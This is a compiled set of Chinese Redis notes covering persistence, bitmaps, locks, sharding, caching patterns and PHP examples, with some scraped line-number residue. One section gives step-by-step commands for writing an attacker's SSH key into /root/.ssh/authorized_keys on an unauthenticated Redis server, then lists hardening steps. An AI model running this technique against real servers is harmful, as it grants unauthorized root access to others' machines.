redis持久化之AOF

把写操作指令,持续的写到一个类似日志文件里。

由于写操作指令保存在日志文件里,异常恢复时把文件里面所有指令执行一遍即可。如果你执行了flushall命令,清空了redis,而你采用的aof持久化方式,那么,就可以找到这个文件,将最后一行flushall删掉,执行恢复命令,将命令全部执行一遍,这样数据就恢复了。
AOF 的默认策略为每秒钟 fsync 一次,在这种配置下,Redis 仍然可以保持良好的性能,并且就算发生故障停机,也最多只会丢失一秒钟的数据( fsync 会在后台线程执行,所以主线程可以继续努力地处理命令请求)。

对于相同的数据集来说,AOF 文件的体积通常要大于 RDB 文件的体积。根据所使用的 fsync 策略,AOF 的速度可能会慢于 RDB 。
Redis 的 bit 可以用于实现比 set 内存高度压缩的计数,它通过一个 bit 10 来存储某个元素是否存在信息。例如网站唯一访客计数,可以把 user_id 作为 bit 的偏移量 offset,设置为 1 表示有访问,使用 1 MB的空间就可以存放 800 多万用户的一天访问计数情况。
SETBIT key offset value # 设置位信息 setbit users 123 1
GETBIT key offset # 获取位信息
BITCOUNT key [start end] # 计数
BITOP operation destkey key [key ...] # 位图合并
基于 bit 的方法比起 set 空间消耗小得多,但是它要求元素能否简单映射为位偏移,适用面窄了不少,另外它消耗的空间取决于最大偏移量,和计数值无关,如果最大偏移量很大,消耗内存也相当可观。

数据在【从服务器】里【读】,在【主服务器】里【写】。
数据库分为两类,一类是主数据库(master),另一类是从数据库[1] (slave)。主数据库可以进行读写操作,当写操作导致数据变化时会自动将数据同步给从数据库。而从数据库一般是只读的,并接受主数据库同步过来的数据。一个主数据库可以拥有多个从数据库,而一个从数据库只能拥有一个主数据库。
SETBIT video:1201 200 1
# 上面的命令就是设置ID为200的用户,已经看过了ID为1201的视频。
GETBIT video:1201 200
# 上面的命令就是查询ID为200的用户是否观看了ID为1201的视频
https://www.zhihu.com/question/27672245
>set zhihu "www.zhihu.com"
>bitcount zhihu
61
$str = "www.zhihu.com";
for($i = 0;$i<strlen($str);$i++) {
$bin .= sprintf("%08b", ord($str[$i]));
}
echo ($bin); #01110111011101110111011100101110011110100110100001101001011010000111010100101110011000110110111101101101
echo array_sum(str_split($bin, 1)); #61

>set andy a
>setbit andy 6 1
>setbit andy 7 0
>get andy
b
BITCOUNT 就是统计字符串的二级制码中,有多少个'1'。 所以在这里,

BITCOUNT andy 得到的结果就是 3 啦。

'a' 的ASCII码是 97。转换为二进制是:01100001。offset的学名叫做“偏移” 。二进制中的每一位就是offset值啦,比如在这里 offset 0 等于 ‘0’ ,offset 1等于'1' ,offset2等于'1',offset 7 等于'1' ,没错,offset是从左往右计数的,也就是从高位往低位。我们通过SETBIT 命令将 andy中的 'a' 变成 'b' 应该怎么变呢?也就是将 01100001 变成 01100010 (b的ASCII码是98),这个很简单啦,也就是将'a'中的offset 60变成1,将offset 71变成0

bitcount key startOffset endOffset

key:键值

startOffset:起始偏移量(注意:这个偏移量是以字节为单位的)

endOffset:结束偏移量(注意:这个偏移量同样是以字节为单位的)

签到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 $dayKey = 'login:'.\date('Ymd',\time());
$redis->setbit($dayKey, $this->user->id, 1);
$redis->bitop('AND', 'threeAnd', 'login:20190311', 'login:20190312', 'login:20190313');
echo "连续三天都签到的用户数量:" . $redis->bitCount('threeAnd');

$redis->bitop('OR', 'threeOr', 'login:20190311', 'login:20190312', 'login:20190313');
echo "三天中签到用户数量(有一天签也算签了):" . $redis->bitCount('threeOr');

$redis->bitop('AND', 'monthActivities'', $redis->keys('login:201903*'));
echo "连续一个月签到用户数量:" . $redis->bitCount('monthActivities');

echo "当前用户指定天数是否签到:" . $redis->getbit('login:20190311', $this->user->id);
https://learnku.com/articles/25181
$redis->scan(0, 'match', 'login:201903*', 'count', 1000))
COUNT 参数的默认值为 10 ,如果不是 0 ,你再使用 scan 3 match login:201903* 继续遍历。

Redis 分布式存储

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
class RedisCluster {
public $servers = array();

public function addServer($host, $port) {
$redis = new Redis();
$redis->_connected = false;
$redis->_host = $host;
$redis->_port = $port;
$this->servers[] = $redis;
}

public function __call($method, $args) {
if (!method_exists("Redis", $method)) {
throw new Execption("not method");
}
$redis = $this->servers[abs(crc32($args[0])) % count($this->servers)];
if (!$redis->_connected) {
$redis->connect($redis->_host, $redis->_port);
$redis->_connected = true;
}
// return $redis->$method(...$args); // PHP 5.6
return call_user_func_array([$redis, $method], $args);
}
}

$rc = new RedisCluster();
$rc->addServer("127.0.0.1", 8000);
$rc->addServer("127.0.0.1", 8001);
https://learnku.com/articles/32153
$rc->set("a", 1);
$rc->set("b", 2);
$rc->set("c", 3);
$rc->set("d", 4);
$rc->set("e", 5);

获取大 key

1
2
redis-cli -h 127.0.0.1 -p 7001 –-bigkeys 也可以追加一个休眠参数,防止在查询过程 ops 暴增,使用此命令:redis-cli -h 127.0.0.1 -p 7001–-bigkeys -i 0.1
https://github.com/leonchen83/redis-rdb-cli

redis锁

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
// 如果获取到锁,则执行 $callback 回调
public function get($callback = null)
{
$result = $this->acquire();

if ($result && is_callable($callback)) {
return tap($callback(), function () {
$this->release();
});
}

return $result;
}

// 如果获取到锁,则执行 $callback 回调
// 如果没有获取到锁,会等待250毫秒,继续去获取锁
// 如果在 $seconds 秒之内还没有获取到锁,会抛出 LockTimeoutException 异常
public function block($seconds, $callback = null)
{
$starting = $this->currentTime();

while (! $this->acquire()) {
usleep(250 * 1000);

if ($this->currentTime() - $seconds >= $starting) {
throw new LockTimeoutException;
}
}

if (is_callable($callback)) {
return tap($callback(), function () {
$this->release();
});
}

return true;
}
class RedisLock extends Lock
{
/**
* The Redis factory implementation.
*
* @var \Illuminate\Redis\Connections\Connection
*/
protected $redis;

/**
* Create a new lock instance.
*
* @param \Illuminate\Redis\Connections\Connection $redis
* @param string $name
* @param int $seconds
* @return void
*/
public function __construct($redis, $name, $seconds)
{
parent::__construct($name, $seconds);

$this->redis = $redis;
}

/**
* Attempt to acquire the lock.
*
* @return bool
*/
public function acquire()
{
$result = $this->redis->setnx($this->name, 1);

if ($result === 1 && $this->seconds > 0) {
$this->redis->expire($this->name, $this->seconds);
}

return $result === 1;
}

/**
* Release the lock.
*
* @return void
*/
public function release()
{
$this->redis->del($this->name);
}
}
https://learnku.com/articles/33111

Redis 未授权访问配合

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
部分 Redis 绑定在 0.0.0.0:6379,并且没有开启认证(这是Redis 的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,将会导致 Redis 服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。
利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。

Redis 暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下可受影响而导致被利用。
ssh-keygen –t rsa
将公钥写入 foo.txt 文件
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt


$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

$ redis-cli -h 192.168.1.11

$ 192.168.1.11:6379> config set dir /root/.ssh/

OK

$ 192.168.1.11:6379> config get dir

1) "dir"

2) "/root/.ssh"

$ 192.168.1.11:6379> config set dbfilename "authorized_keys"

OK

$ 192.168.1.11:6379> save

OK
这样就可以成功的将自己的公钥写入 /root/.ssh 文件夹的 authotrized_keys 文件里,然后攻击者直接执行:

$ ssh –i id_rsa root@192.168.1.11
即可远程利用自己的私钥登录该服务器。
当然,写入的目录不限于 /root/.ssh 下的authorized_keys,也可以写入用户目录,不过 Redis 很多以 root 权限运行,所以写入 root 目录下,可以跳过猜用户的步骤。
可以使用Pocsuite(http://github.com/knownsec/pocsuite)执行以下的代码可以用于测试目标地址是否存在未授权的Redis服务。

https://www.waitalone.cn/redis-unauthorized-of-expolit.html
配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379
配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中
配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如config

Redis 查看所有 key 的 value 值所占内存大小

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
https://github.com/sripathikrishnan/redis-rdb-tools#generate-memory-report
$ pip install rdbtools python-lzf
$ git clone https://github.com/sripathikrishnan/redis-rdb-tools
$ cd redis-rdb-tools
$ sudo python setup.py install

接下来找到 redis 的 dump.rdb 位置

首先定位到 redis.conf 位置

$ whereis redis.conf
redis: /etc/redis.conf
$ cat /etc/redis.conf | grep dir | grep redis
dir /var/lib/redis
$ cat /etc/redis.conf | grep dump.rdb
dbfilename dump.rdb
综上,得知其路径为:/var/lib/redis/dump.rdb

按内存值导出 csv

$ rdb -c memory /var/lib/redis/dump.rdb > /tmp/redis.csv
https://learnku.com/articles/33211

管理平台工具 RedisManager

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
github项目地址:https://github.com/ngbdf/redis-manager

下载安装:
系统环境:
LINUX
JDK1.8

#Releases
https://github.com/ngbdf/redis-manager/releases

#当前最新版本 1.1
wget https://github.com/ngbdf/redis-manager/releases/download/redismanager-1.1-release/redis-manager-1.1-release.tar.gz

#创建数据库
create database dbname default character set utf8mb4 collate utf8mb4_general_ci;

#解压
tar xf redis-manager-1.1-release.tar.gz
cd redis-manager-1.1/

#修改配置文件
cd conf/
vim application.yml

#端口号
server:
tomcat.uri-encoding: UTF-8
port: 8182


#数据库,仅需自己创建数据库即可,相关表会自动生成
datasource:
name: dbname
driver-class-name: com.mysql.jdbc.Driver
url: jdbc:mysql://192.168.1.1:3306/dbname?useUnicode=true&characterEncoding=utf-8
username: user
password: passwd

启动访问:
#执行bin目录下的start.sh脚本
./bin/start.sh

#查看进程
ps -ef |grep java

#查看端口
netstat -lntp |grep 8182
tcp6 0 0 :::8182 :::* LISTEN 7774/java
https://me.jinchuang.org/archives/430.html

Redis监控工具 redis-stat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
https://github.com/junegunn/redis-stat
yum install ruby ruby-devel rubygem
#更换gem源,使用国内镜像源下载更快
gem source -a https://ruby.taobao.org/ #添加淘宝源
gem source -r http://rubygems.org/ #删除境外源

[root@localhost ~]# gem install redis --version 3.0.0 #默认最新是4.0版本
Fetching: redis-3.0.0.gem (100%)
[root@localhost ~]# gem install redis-stat
Fetching: ansi256-0.2.5.gem (100%)
Successfully installed ansi256-0.2.5
使用redis-stat 命令行形式
[root@localhost ~]# redis-stat 127.0.0.1:6379
/usr/local/rvm/gems/ruby-2.4.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1070: warning: constant ::Fixnum is deprecated
使用redis-stat webserver形式
[root@localhost ~]# redis-stat 127.0.0.1:6379 --server=6666 --daemon #端口自定义
/usr/local/rvm/gems/ruby-2.4.1/gems/sinatra-1.3.6/lib/sinatra/base.rb:1070: warning: constant ::Fixnum is deprecated

打开http://服务器ip地址:8000 访问

集群也是一样的
redis-stat 192.168.16.186:7000 192.168.16.186:7001 192.168.16.186:7002 192.168.16.186:7003 192.168.16.186:7004 192.168.16.186:7005 --
https://me.jinchuang.org/archives/233.html

loading redis is loading the dataset in memory laravel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
[root@localhost ~]# redis-cli
127.0.0.1:6379> ping
(error) MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please check Redis logs for details about the error.

ps aux|grep redis|grep -v grep|awk '{print $2}'|xargs kill -9
redis-server /etc/redis.conf

127.0.0.1:6379[1]> ping
(error) LOADING Redis is loading the dataset in memory

echo 'vm.overcommit_memory = 1' >> /etc/sysctl.conf
sysctl vm.overcommit_memory=1
127.0.0.1:6379> ping
PONG
但是写不进Redis

Redis被配置为保存数据库快照,但它目前不能持久化到硬盘。用来修改集合数据的命令不能用。请查看Redis日志的详细错误信息。

原因
强制关闭Redis快照导致不能持久化。

解决方案
将stop-writes-on-bgsave-error设置为no

➜ sh redis-cli -h 172.16.200.xx -p 6378
172.16.200.xx:6378> config set stop-writes-on-bgsave-error no
找到运维排查机器硬盘内存是否满了,果然,还真是硬盘内存满了,导致持久化保存快照时,发生异常。
[root@localhost ~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 4.0G 2.1G 1.8G 55% /
tmpfs 5.9G 0 5.9G 0% /dev/shm
/dev/sda7 96G 11G 80G 12% /data0
/dev/sda5 7.9G 278M 7.3G 4% /tmp
/dev/sda3 12G 8.8G 2.5G 79% /usr
/dev/sda6 7.9G 7.8G 0 100% /var

127.0.0.1:6379> config get dir
1) "dir"
2) "/var/lib/redis"
127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "dump.rdb"
持久化文件/varlib/redis/dump.rdb 满了 写不进去了


https://stackoverflow.com/questions/19581059/misconf-redis-is-configured-to-save-rdb-snapshots
http://ju.outofmemory.cn/entry/197760

提前10分钟提醒信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
1.修改redis配置文件

notify-keyspace-events "Ex"
2.修改datebase配置文件

'notify_cache' => [
'host' => env('REDIS_HOST', '127.0.0.1'),
'password' => env('REDIS_PASSWORD', null),
'port' => env('REDIS_PORT', 6379),
'database' => env('REDIS_DB', 4),
'read_write_timeout' => -1, // 读写超时设定
],
3.创建过期key

$ttl = strtotime($data['return_time']) - time() - 600;
$redis = Redis::connection('notify_cache');
$redis->set('NOTIFY_CONFIRM:'.$id,$id);
$redis->expire('NOTIFY_CONFIRM:'.$id,$ttl);
4.创建监听队列

$cache_db = config('database.redis.notify_cache.database',4);
$pattern = '__keyevent@'.$cache_db.'__:expired';
Redis::connection('notify_cache')->subscribe($pattern,function ($channel){
// 订阅键过期事件
Log::info('-----notify-----'.$channel);
$key_type = str_before($channel,':');
switch ($key_type) {
case 'NOTIFY_CONFIRM':
$id = str_after($channel,':'); // 取出学员ID
$client = Client::find($id);
if ($client) {
//业务逻辑
}
}
break;
default:
break;
}
});

加入队列https://learnku.com/articles/34526
const LISTEN_REDIS_NAME = 'eeop:axb:bind_log';//定时解绑做判断处理
const AUTO_TIMEOUT = 60;//自动解绑60s
//加入队列 有序队列
$this->redis::zadd(self::LISTEN_REDIS_NAME, time() + self::AUTO_TIMEOUT, $this->bind_id);
2. 解绑服务

$list = $this->redis::ZRANGEBYSCORE(self::LISTEN_REDIS_NAME,0,time());
foreach ($list as $value){
$this->redis::zrem(self::LISTEN_REDIS_NAME, $value);
}


https://www.jianshu.com/p/588891acd44c

Redis 持久化存储

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
一种是 aof 日志追加的方式,另外一种是 rdb 数据快照的方式。
RDB 持久化存储即是将 redis 存在内存中的数据以快照的形式保存在本地磁盘中。

手动备份通过 save 命令和 bgsave 命令。save 是同步阻塞,而 bgsave 是非阻塞 (阻塞实际发生在 fork 的子进程中)。因此,在我们实际过程中大多是使用 bgsave 命令实现备份.
自动备份

a. 修改配置项 save m n 即表示在 m 秒内执行了 n 次命令则进行备份.

b. 当 Redis 从服务器项主服务器发送复制请求时,主服务器则会使用 bgsave 命令生成 rbd 文件,然后传输给从服务器.

c. 当执行 debug reload 命令时也会使用 save 命令生成 rdb 文件.

d. 当使用 shutdown 命令关掉服务时,如果没有启用 aof 方式实现持久化则会采用 bgsave 的方式做持久化。同时 shutdown 后面可以加备份参数 [nosave|save].

优势:

1. 文件实现的数据快照,全量备份,便于数据的传输。比如我们需要把 A 服务器上的备份文件传输到 B 服务器上面,直接将 rdb 文件拷贝即可.

2. 文件采用压缩的二进制文件,当重启服务时加载数据文件,比 aof 方式更快.

劣势:

1.rbd 采用加密的二进制格式存储文件,由于 Redis 各个版本之间的兼容性问题也导致 rdb 由版本兼容问题导致无法再其他的 Redis 版本中使用.

2. 时效性差,容易造成数据的不完整性。因为 rdb 并不是实时备份,当某个时间段 Redis 服务出现异常,内存数据丢失,这段时间的数据是无法恢复的,因此易导致数据的丢失.
当遇到磁盘写满情况,可以使用如下命令来切换存储磁盘


// dirName则是新的存储目录名(该方式同样适用于aof格式)

config set dir dirName
AOF 持久化存储是什么

录 redis 的操作日志,将 redis 执行过的命令记录下载,当我们需要数据恢复时,redis 去重新执行一次日志文件中的命令
// 将no改为yes,控制aof开启与否

appendonly no

// 控制aof文件名称,存储的目录便是dir配置项

appendfilename "appendonly.aof"

// 三种备份策略(三者只需要开启以一个即可)

# appendfsync always // 命令写入立即写入磁盘

appendfsync everysec // 每秒实现文件的同步,写入磁盘

# appendfsync no // 随机进行文件的同步,同步操作则交给操作系统来负责,通常时间是最长30s

优点:

多种文件写入 (fsync) 策略.

数据实时保存,数据完整性强。即使丢失某些数据,制定好策略最多也是一秒内的数据丢失.

可读性强,由于使用的是文本协议格式来存储的数据,可有直接查看操作的命令,同时也可以手动改写命令.

缺点:

文件体积过大,加载速度比 rbd 慢。由于 aof 记录的是 redis 操作的日志,一些无效的,可简化的操作也会被记录下来,造成 aof 文件过大。但该方式可以通过文件重写策略进行优化.

选择 AOF 还是 RDB 进行数据的持久化

1. 针对不同的情况来选择,建议使用两种方式相结合.

2. 针对数据安全性、完整性要求高的采用 aof 方式.

3. 针对不太重要的数据可以使用 rdb 方式.

4. 对于数据进行全量备份,便于数据备份的可以采用 rdb 方式. https://learnku.com/articles/33954

文章投票

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
一个用户对一篇文章只能投一票
一篇文章发布 7 天后不能再进行投票
文章得分计算规则:发布时间 + 得票数 X 倍数(这里的倍数计算规则为:86400/200=43286400 为一天的秒数,200 为一天时间对应的投票数
/**
* Redis In Action
* 文章投票功能
* 前提条件:
* 文章发表时,记录作者、发表时间、链接、标题、初始投票数
* 每获得一个投票,文章获得432分(86400/200)
* 数据结构:
* 文章hash -- 每篇文章key的形式如:article:92617
* 文章发表时间zset集合(time:),按时间排序 -- 每条记录的形式如:article:92617(member) 1332065417(score)
* 文章得分zset集合(score:),按分数排序
* 用户对文章的投票set集合(vote:xxxx) -- key形式如:vote:100408,item形式如:user:233487
*/
const ONE_WEEK_IN_SECONDS = 7 * 86400;
const VOTE_SCORE = 432;
const ARTICLES_PER_PAGE = 25;
$redis = new Redis();
$redis->connect('127.0.0.1', '6379') || exit('连接失败!');
/**
* 文章投票
* @param Redis $redis
* @param $user
* @param $article
*/
function articleVote($redis, $user, $article)
{
$cutoff = time() - ONE_WEEK_IN_SECONDS;
//对发表时间超过一周的文章投票不生效
//获取 time: 有序集合对应 member 的 score
if ($redis->zScore('time:', $article) < $cutoff) {
return;
}
$article_id = explode(':', $article)[1];
//无序集合,添加记录,如果记录存在,返回0(说明用户已对该文章投票),反之则计算分数
if ($redis->sAdd('voted:' . $article_id, $user)) {
// 使用事务操作
/*$redis->multi()
->zIncrBy('score:' , VOTE_SCORE, $article) //增加文章的分数
->hIncrBy($article, 'votes', 1) //增加文章的投票数
->exec();*/
//使用pipeline型的事务
//一次性向服务端发送所有命令,减少客户端与服务端之间通讯往返次数
$pipe = $redis->multi(Redis::PIPELINE);
$pipe->zIncrBy('score:', VOTE_SCORE, $article);
$pipe->hIncrBy($article, 'votes', 1);
$pipe->exec();
}
}
/**
* 发表文章
* @param Redis $redis
* @param string $user example: 'user:123456'
* @param $title
* @param $link
* @return integer
*/
function postArticle($redis, $user, $title, $link)
{
$article_id = $redis->incr('article:'); //自增1,不存在key则赋值1
$voted = 'voted:' . $article_id;
$redis->sAdd($voted, $user); //将作者设为已投票用户
$redis->expire($voted, ONE_WEEK_IN_SECONDS); //文章投票信息设置为一周后自动失效
$now = time();
//添加文章
$article = 'article:' . $article_id; //作为文章hash的key值
$redis->hMSet($article, [ //批量设置hash键值对
'title' => $title,
'link' => $link,
'poster' => $user,
'time' => $now,
'votes' => 1,
]);
//注意zadd第二个参数为score,第三个为member
$redis->zAdd('score:', $now + VOTE_SCORE, $article); //设置文章初始分数
$redis->zAdd('time:', $now, $article); //记录文章发表时间
return $article_id;
}
/**
* 获取文章列表
* @param Redis $redis
* @param $page
* @param string $order 用来排序的有序集合
*/
function getArticles($redis, $page, $order = 'score:')
{
$start = ($page - 1) * ARTICLES_PER_PAGE;
$end = $start + ARTICLES_PER_PAGE - 1;
//获取指定范围内的member值(文章ID,article:123456),按$order分数递减排序
$ids = $redis->zRevRange($order, $start, $end);
$pipe = $redis->multi(Redis::PIPELINE);
foreach ($ids as $id) {
$pipe->hGetAll($id);
//不使用pipeline的时候
/*$article_data = $redis->hGetAll($id);
$article_data['id'] = $id;
$articles[] = $article_data;*/
}
$articles = $pipe->exec();
//把文章ID加回去
foreach ($articles as $k => $article) {
$articles[$k]['id'] = $ids[$k];
}
return $articles;
}
/**
* 添加/移除文章分类
* @param Redis $redis
* @param $article_id
* @param array $to_add
* @param array $to_remove
*/
function addRemoveGroups($redis, $article_id, $to_add = [], $to_remove = [])
{
$article = 'article:' . $article_id;
foreach ($to_add as $group) {
$redis->sAdd('group:' . $group, $article);
}
foreach ($to_remove as $group) {
$redis->sRem('group:' . $group, $article);
}
}
/**
* 获取分组下的文章数据
* @param Redis $redis
* @param $group
* @param $page
* @param string $order
*/
function getGroupArticles($redis, $group, $page, $order = 'score:')
{
$key = $order . $group;
if (!$redis->exists($key)) {
//获得对应分组下,文章-分数的有序集合
$redis->zInterStore($key, ['group:' . $group, $order], [1, 1], 'max');
$redis->expire($key, 60);
}
return getArticles($redis, $page, $key);
}
//发布若干文章
postArticle($redis, 'user:1', '测试文章1', 'article-link-1');
postArticle($redis, 'user:2', '测试文章2', 'article-link-2');
postArticle($redis, 'user:3', '测试文章3', 'article-link-3');
//用户10对文章1进行投票
articleVote($redis, 'user:10', 'article:1');
echo "article:1 的投票用户:" . PHP_EOL;
$result = $redis->sMembers('voted:1');
print_r($result);
echo "各文章得分:" . PHP_EOL;
$scores = $redis->zRange('score:', 0, -1, 'withscores');
print_r($scores);
echo "文章列表:" . PHP_EOL;
$articles = getArticles($redis, 1);
print_r($articles);
exit();
//给文章添加分类
addRemoveGroups($redis, '1', ['php', 'redis']);
addRemoveGroups($redis, '2', ['python', 'redis']);
//获取‘redis’分组下的文章
$redisGroupArticles = getGroupArticles($redis, 'redis', 1);
echo "redis分类的文章列表:" . PHP_EOL;
print_r($redisGroupArticles);
https://github.com/HubQin/redis-in-action-php/blob/master/article_voting.php
https://learnku.com/articles/29511

缓存穿透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
缓存穿透 : DB 承受了没有必要的查询流量,意思就是查到空值的时候没有做缓存处理,再次查询的时候继续读库了
缓存击穿:热点 Key,大量并发读请求引起的小雪崩, 就是缓存在某个时间点过期的时候,恰好在这个时间点对这个 Key 有大量的并发请求过来,这些请求发现缓存过期一般都会从后端 DB 加载数据并回设到缓存,这个时候大并发的请求可能会瞬间把后端 DB 压垮
缓存雪崩:缓存设置同一过期时间,引发的大量的读取数据库操作
https://www.jianshu.com/p/fef1c22d63cb

1)缓存穿透

请求去查询一条压根儿数据库中根本就不存在的数据,也就是缓存和数据库都查询不到这条数据,但是请求每次都会打到数据库上面去。

解决方案:

1. 对于返回为 NULL 的依然缓存

2. 制定一些规则过滤一些不可能存在的数据

2)缓存击穿

在平常高并发的系统中,大量的请求同时查询一个 key 时,此时这个 key 正好失效了,就会导致大量的请求都打到数据库上面去。这种现象我们称为缓存击穿。

解决方案:

1. 加分布式锁,对于获取到这个锁的线程,查询数据库更新缓存,其他线程采取重试策略

2. 采取到期自动刷新的策略,而不是到期自动淘汰

3)缓存雪崩

当某一时刻发生大规模的缓存失效的情况,比如你的缓存服务宕机了,会有大量的请求进来直接打到 DB 上面。

解决方案:

1. 增加缓存系统可用性,通过监控关注缓存的健康程度,根据业务量适当的扩容缓存。

2. 采用多级缓存,不同级别缓存设置的超时时间不同,及时某个级别缓存都过期,也有其他级别缓存兜底。

3. 缓存的过期时间可以取个随机值,尽量让不同 Key 的过期时间不同。

六、缓存更新策略

1)Cache Aside

应用查询数据的时候先查询缓存层的数据,如果缓存中没有则到数据库中查询数据,并把数据放入缓存层。

更新数据的时候先对数据库进行更新,然后通过指令使缓存层的数据失效。

(2)Read/Write Through

应用要读数据和更新数据都直接访问缓存服务

缓存服务同步的将数据更新到数据库

(3)Write Behind

应用要读数据和更新数据都直接访问缓存服务

缓存服务异步的将数据更新到数据库(通过异步任务)
https://learnku.com/articles/29751

Redis 的 LBS 尝试地理位置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$redis->rawCommand('geoadd', 'location', '120.118007', '30.259293', '桃园岭');
$redis->rawCommand('geoadd', 'location', '120.119445','30.255082', '农耕科普园');
$redis->rawCommand('geoadd', 'location', '120.071655','30.272893', '西溪湿地');
$redis->rawCommand('geoadd', 'location', '120.114321','30.221218', '龙井村');
$redis->rawCommand('geoadd', 'location', '120.145012','30.205586', '白塔公园');
$redis->rawCommand('geoadd', 'location', '120.112912','30.224221', '十里琅珰');
$redis->rawCommand('geoadd', 'location', '120.107264','30.206997', '狮峰');
$redis->rawCommand('geoadd', 'location', '120.117936','30.227969', '真迹寺');
$redis->rawCommand('geoadd', 'location', '120.10826','30.246569', '灵隐寺');
$redis->rawCommand('geoadd', 'location', '120.114123','30.264152', '状元峰');
我们获取西溪湿地和龙井村的距离

$ret = $redis->rawCommand('GEODIST', 'location','西溪湿地', '龙井村', 'm');
print_r($ret); //7060.0083
其他命令:

// 返回灵隐寺,状元峰的位置
$ret = $redis->rawCommand('GEOPOS', 'location','灵隐寺', '状元峰');
print_r($ret);
// 返回'120.114253','30.219759'坐标附近1km的地址
$ret = $redis->rawCommand('GEORADIUS', 'location','120.114253','30.219759', 1, 'km', 'WITHDIST');
print_r($ret);
$ret = $redis->rawCommand('GEOHASH', 'location','龙井村', '灵隐寺');
print_r($ret);
https://learnku.com/articles/35871

基于redis的秒杀

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
//实例化redis
$redis = new Redis();
//连接
$redis->connect('127.0.0.1', 6379);
$key = 'sale';
//检测是否连接成功
// echo "Server is running: " . $redis->ping();
$redis->setnx($key, 0);
$redis->watch($key); //监测一个key的值是否被更改

$sale_num = $redis->get($key);


if ($sale_num > 4) {
exit();
}


$redis->multi(); //标记事务


$redis->incr($key); //销量+1
sleep(1); //模拟真实环境
$ret = $redis->exec(); // 事务块内所有命令的返回值,按命令执行的先后顺序排列。
if ($ret) {
include 'db.php';
$db = new db([
'database_type' => 'mysql',
'database_name' => 'test',
'server' => 'www.13sai.com&#39;,
'username' => '13sai',
'password' => '*',
'charset' => 'utf8'
]);
$db->update('goods', ["stock_num[-]" => 1], ['id' => 1]);
}

查看所有 key 的 value 值所占内存大小

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

$ pip install rdbtools python-lzf
$ git clone https://github.com/sripathikrishnan/redis-rdb-tools
$ cd redis-rdb-tools
$ sudo python setup.py install
$ whereis redis.conf
redis: /etc/redis.conf
$ cat /etc/redis.conf | grep dir | grep redis
dir /var/lib/redis
$ cat /etc/redis.conf | grep dump.rdb
dbfilename dump.rdb
综上,得知其路径为:/var/lib/redis/dump.rdb

按内存值导出 csv

$ rdb -c memory /var/lib/redis/dump.rdb > /tmp/redis.csv
https://learnku.com/articles/33211

Redis 快速上手

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
